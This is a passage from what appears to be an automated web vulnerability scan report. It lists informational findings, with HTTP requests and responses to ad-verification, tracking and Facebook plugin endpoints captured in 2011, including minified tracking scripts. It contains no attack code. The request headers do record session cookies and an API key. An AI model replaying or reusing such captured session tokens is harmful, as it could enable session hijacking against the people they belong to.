(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}cat
...[SNIP]...

Request 2

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DAC6B7CEF6FFC9229096991200C9A360; Path=/
Content-Type: text/javascript
Content-Length: 7973
Date: Thu, 16 Jun 2011 14:14:00 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,val:A[E]});}}
...[SNIP]...

14.7. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Request 1

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F794E24AA5C6E9C9B7908B9876B4AC42; Path=/
Content-Type: text/javascript
Content-Length: 8150
Date: Thu, 16 Jun 2011 13:13:08 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catc
...[SNIP]...

Request 2

GET /rjss/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=73B540A34BF97E9696A68E9C679A5081; Path=/
Content-Type: text/javascript
Content-Length: 7973
Date: Thu, 16 Jun 2011 13:13:09 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102769/PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,val:A[E]});}}
...[SNIP]...

14.8. http://pixel.adsafeprotected.com/jspix previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Request 1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3B01423A1106A1A8C78598547B9659F; Path=/
Content-Type: text/javascript
Content-Length: 7901
Date: Thu, 16 Jun 2011 13:08:05 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,val:A[E]});}}B.sort(function(G,F){return(G.val.length>F.val.length)?1:(G.val.length<F.v
...[SNIP]...

Request 2

GET /jspix?anId=124&pubId=test2&advId=netflix&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=541FB52F910D8872394FED599BC2C056; Path=/
Content-Type: text/javascript
Content-Length: 7770
Date: Thu, 16 Jun 2011 13:08:06 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "null",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&G===z.DIR){if(typeof E==="object"){for(var F in E){if(E.hasOwnProperty(F)){var A=(typeof C!=="undefined")?C+" : ":"";k(E[F],G,A+F);}}}else{try{console.log(C+": "+E);}catch(D){}}}else{try{console[G](E);}catch(B){}}}};var r=function(C,B){var A,F,E;k("Server Parameters:");k(adsafeVisParams,z.DIR);var D="Detection Results:\n\n";for(A in C){E=C[A];D+=E.key+": "+decodeURIComponent(E.val)+"\n";}k(D);D="key: \n";for(F in B){if(B.hasOwnProperty(F)){D+=F+": "+B[F]+"\n";}}k(D);};k("v"+f+", mode: "+adsafeVisParams.mode);var j={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var n=function(){var A={};try{A.a=encodeURIComponent(top.location.href);}catch(D){}try{A.b=encodeURIComponent(parent.location.href);}catch(D){}try{A.c=encodeURIComponent(parent.document.referrer);}catch(D){}try{A.d=encodeURIComponent(window.location.href);}catch(D){}try{A.e=encodeURIComponent(window.document.referrer);}catch(D){}try{A.f=encodeURIComponent(adsafeVisParams.jsref);}catch(D){}try{var C=a();A.g=encodeURIComponent(C.g);A.q=encodeURIComponent(C.q);}catch(D){}A=l(A);A=m(A);var B=[];for(var E in A){if(A.hasOwnProperty(E)){B.push({key:E,val:A[E]});}}B.sort(function(G,F){return(G.val.length>F.val.length)?1:(G.val.length<F.val.length)?-1:0;});r(B,j);return B;};var l=function(A){for(var C in A){if(A.hasOwnProperty(C)){var B=A[C];if(B==""||B=="null"||B=="
...[SNIP]...

14.9. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response 1

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:32:40 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:32:40 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-32-40_6866489311308249160; expires=Tue, 14-Jun-2016 18:32:40 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_6866489311308249160; expires=Thu, 16-Jun-2011 18:47:40 GMT; path=/; domain=c3metrics.com
Content-Length: 6656
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3VJS.c3VJSinViewPid)}var c=document.get
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response 2

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:33:10 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Content-Type: text/html

14.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

14.11. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

14.12. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Request 1

GET /widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

Request 2

GET /widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

15. Cross-domain Referer leakage previous next
There are 110 instances of this issue:

http://a.rfihub.com/sed
http://a.tribalfusion.com/j.ad
